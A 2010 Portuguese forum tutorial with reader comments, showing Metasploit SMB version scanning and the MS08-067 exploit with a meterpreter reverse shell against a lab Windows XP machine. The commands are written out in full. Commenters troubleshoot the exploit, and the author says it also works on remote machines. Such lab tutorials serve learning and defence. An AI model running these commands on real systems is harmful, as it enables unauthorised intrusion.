Intrusão simples com Metasploit

Salve salve galera do VOL! Aqui vai mais um artigo falando sobre o framework Metasploit. Irei demonstrar algumas técnicas simples/básicas de scanning e fingerprint usando o Metasploit e em seguida exploraremos uma máquina MS para obtermos uma shell. Let`s go???

[ Hits: 168.451 ]

Por: Roberto Soares (3spreto) em 26/03/2010 | Blog: http://codesec.blogspot.com


Opções Metasploit



Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.

Como vimos através do script do nmap que nosso alvo é vulnerável, nós podemos realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.

Certo, mas como? Vamos utilizar um módulo auxiliar presente no Metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.

Executaremos os seguintes comandos no console do msf:

use auxiliary/scanner/smb/smb_version #Falamos que queremos utilizar o scanner smb_version.
set RHOSTS 192.168.0.186 #Aqui eu setei um único host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24.
run #Comando para executar nosso scanner.
Linux: Intrusão Simples com Metasploit
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.

use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
set TARGET 31 #Aqui eu digo que o alvo usa
exploit #E finalmente executamos nosso exploit.

Na imagem abaixo,com o comando show targets são listados todos os S.O.s vulneráveis a este exploit (ms08_067).
Linux: Intrusão Simples com Metasploit
Veja abaixo que iremos utilizar a opção 31.
Linux: Intrusão Simples com Metasploit
Veja o ataque agora.
Linux: Intrusão Simples com Metasploit
Veja que não foi realizada a etapa de fingerprint com o alvo, pois "falamos" para o exploit o S.O. que ele encontrará em seu destino.

Ok! Finish! The end! Heheheh

Ah!
Linux: Intrusão Simples com Metasploit
É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit. Como continuação, poderão seguir o outro artigo que escrevi sobre o Metasploit:
Abraços a todos!

Roberto Soares (3spreto)
codesec.blogspot.com
www.backtrack.com.br
robertoespreto@gmail.com
espreto@backtrack.com.br
®

Interessados em cursos sobre Metasploit? Email-me! :-)

Att.

Página anterior    

Páginas do artigo
   1. Começando!
   2. Opções Metasploit
Outros artigos deste autor

Vazamento de informações vitais via "HP Operations Manager Perfd"

Recon and Scan with Metasploit

Metasploit Exploitation

Metasploit Community Edition - Instalation

CouchDB - For Fun and Profit

Leitura recomendada

HoneyPots em Linux

Tornando o OpenBSD stable

Snort em modo defensivo com Flex Response 2

Restrição em diretórios usando o Apache2 sem mistérios

PortSentry: Melhorando a segurança do seu Linux

  
Comentários
[1] Comentário enviado por mbfagundes em 26/03/2010 - 13:25h

hehehe... esse foi a simples, imagina o que foi dado no treinamento metasploit em campinas ... akilo la nao tem como mensurar né ... HandsUP

[2] Comentário enviado por marcio.itpro em 26/03/2010 - 13:27h

É, fiquei preocupado agora.

[3] Comentário enviado por Gilmar_GNU/slack em 26/03/2010 - 13:47h

Curti a matéria.
Ja que não uso o Backtrack então ja tenho como base o slackware.
Imagina isso com um monte de lan de fundo de quintal rolando aqui.

hahahahaah

Só desastre.

[4] Comentário enviado por eduardo em 26/03/2010 - 14:09h

Muito bom o artigo.
Parabéns

[5] Comentário enviado por Lisandro em 26/03/2010 - 15:55h

Aatabom...

[6] Comentário enviado por jonasricardo em 26/03/2010 - 19:38h

vamos aos testes entao, valew muito bom

[7] Comentário enviado por paulorvojr em 27/03/2010 - 11:05h

belo artigo, parabens

a mod distro backtrack tem centenas de exploits prontinhos pra serem usados rsrsrsrs

o chato disso é que uns kiddie´s vão logo pensar que é hacker e teu artigo vai parar naquelas páginas feitas em html com uma caveira digital em GIF, invadindo o XP!! rsrsrs

pessoal é fogo...rsrsrs

adoro o backtrack, uso mais pra testar vulnerabilidade de servers e clients.

abraços!


[8] Comentário enviado por removido em 27/03/2010 - 13:33h

Li recentemente na INFO que os usuários de software livre são justamente os que mais sofrem de fraudes e invasões em seus sistemas, justamente por pensarem que estão imunes à qualquer ameaça digital. Entretanto, não há sistema para imune a burrice humana : D

A melhor maneira de nos defendermos de um atual ataque é sabendo como eles funcionam de antemão. Alguns usuários tradicionais talvez achem um absurdo ensinar técnicas de invasão, mas a verdade é que somente aprendendo-as é possível defender-se de forma mais eficiente.

Parabéns pelo artigo.

[9] Comentário enviado por lestatwa em 29/03/2010 - 13:15h

Parabéns pelo artigo!
A uns anos atrás quando eu iniciava na área senti falta de um material bem explicado.
O problema da informação, é que... bem... tem gente que "com poder demais" nas mãos, faz cagada!

[10] Comentário enviado por marcus.andrade8 em 25/04/2010 - 07:46h

Funcionou blz com o xpsp3 (lembrando que para esse S.O. a falha é outra, porém da mesma linha). Fiz um vídeo mostrando o procedimento. Para proteger o sistema, basta aplicar as atualizações de segurança, ou no caso dos meus testes, habilitar o firewall do Windows foi tudo o que precisei. Abraços!
http://www.youtube.com/watch?v=9ydB1dApenU

[11] Comentário enviado por peregrino em 02/07/2010 - 14:31h

Boa Tarde otimo tutorial, fiz uns testes e realmente funciona so gostaria de saber e quando o firewall do windows xp esta abilitado o que eu poderia fazer para ter sucesso

obrigado

[12] Comentário enviado por renato_pacheco em 17/01/2011 - 14:31h

Poxa... estou tentando testar a ferramenta, mas quando eu encontro uma máquina vulnerável, eu executo o exploit direitim, mas num cria a sessão (sessions). O q está dando d errado? A msg é essa:

[*] Exploit completed, but no sessions was created.

Ah! Quando listo as sessões, mostra (sessions -l):

Active sessions
==========

No active sessions.


[13] Comentário enviado por roberto_espreto em 20/01/2011 - 18:04h

@renato_pacheco

Verifique o firewall do windows se está ativo ou não! Está executando contra um win SP2 ou SP3? Está na mesma range de IP? Passe mais detalhes que conseguirei de ajudar!

Att,

[14] Comentário enviado por vinteumdoonze em 18/09/2011 - 16:29h

Cara, parabens, muito bom esse seu artigo, me ajudou a fazer um trabalho da faculdade, não se preocupe eu divulguei a fonte.
Muito bom..

[15] Comentário enviado por mikeitaly em 29/09/2011 - 16:17h

faço essa pergunta a todos que usam backtrack..
estou usando a versao 5 R1.. es estou fazendo testes na minha rede interna..

comigo o resultado ja foi diferente..
...
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
...

Reparem ele diz que "regsvc DoS" , " SMBv2 DoS " , " MS06-025 " , " MS07-029 " nao foram checados se tinham falhas ou naum, porque no script que foi usado naum tinha o parametro
" --script-args=unsafe=1 " ..
como eu faço pra adicionar esse parametro e onde fica o script para eu adicionar esse parametro?

grato! mikE!

[16] Comentário enviado por renato_pacheco em 29/09/2011 - 16:19h

@mikeitaly,

Seguindo o exemplo:

# nmap -v --script=smb-check-vulns --script-args=unsafe=1 192.168.0.0/24

[17] Comentário enviado por mikeitaly em 29/09/2011 - 16:36h

cara creio que nao é assim.. pq eu ja testei esse procedimento... creio que eu tenha que editar na unha o script que esta sendo usado..

=/..

[18] Comentário enviado por renato_pacheco em 29/09/2011 - 16:42h

@mikeitaly,

Bródi, kbei d fazer e funcionou aki comigo. Teste antes d questionar.

[19] Comentário enviado por meetgyn em 15/02/2012 - 01:48h

Cara curti muito seu trabalho porem estou com uma dificuldade igual a do colega acima:
Primeiro quero saber se esta tecnica ai funciona remotamente. Pois fiz tudo via vmware e deu certo, mais remoto não funcionou.
segundo Instalei o metasploit em meu mandriva powerpack ta tudo certinho mais quando vou executar o procedimento ele retorna o erro "Exploit completed, but no session created"
teria com dar uma ajuda?




cleytomgyn@yahoo.com.br

[20] Comentário enviado por igor_rocha em 27/03/2012 - 03:59h

Funciona somente em Vm´s ¬¬'

[21] Comentário enviado por roberto_espreto em 27/03/2012 - 07:31h

Este tutorial foi criado baseando-se em máquinas virtuais, porém, também funciona em máquinas reais e remotas, basta apenas atentar-se a regras de encaminhamento de portas (Port Forwarding) entre outros por menores. Adapte-se! :D

[22] Comentário enviado por JonatasLaet em 28/12/2012 - 20:13h

Usei o VMware pras duas. Ambas com as configurações mencionadas. Mas o resultado não foi o esperado. Abaixo coloquei o link da PrintScreen do resultado. Ajude-me quem puder.

http://i.troll.ws/a1db30ad.png
http://i.troll.ws/d01bcd01.png

[23] Comentário enviado por ftalinux em 31/03/2013 - 14:47h

cara esse tutorial seu fala pro c!!!
vc que informa para os usuarios que voce sabe utilizar essa ferramenta neh!!!
pq isso nao foi um tutorial !!
vc e robo ????
esses topicos ae acaba com a comunidade d vcs,inrriquece a pagina de porcaria !!!!!! vivaolinux ta meio largado,,,,,,,FRACO FRACO FRACO

[24] Comentário enviado por gseis em 02/03/2016 - 02:11h

Sem querer ser daqueles iniciantes Linux enjoados/chatos ou aquela molecada de 10 anos invadindo orkut, mas se possível gostaria de obter mais info sobre o tema, também gostaria de aprender a explorar vulnerabilidade de sites, pra ser mais exato gostaria de entender e conhecer "conteúdos crackers" (Mais polêmicos que mamilos).

Sou novo no Linux (Uso Mint há uma semana), entendo nada ou quase nada de rede e vulnerabilidade. Se alguém souber de alguns links para iniciar os estudos sobre os temas citados ficarei bastante agradecido.

[25] Comentário enviado por torver em 28/10/2016 - 00:27h

Eu to com problema no script -v --script=smb-check-vulns , tentei varias coisas aqui que vi em outros foruns (por exemplo especificar a vulnerabilidade) contudo o erro continua, alguem ja passou por isso?



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts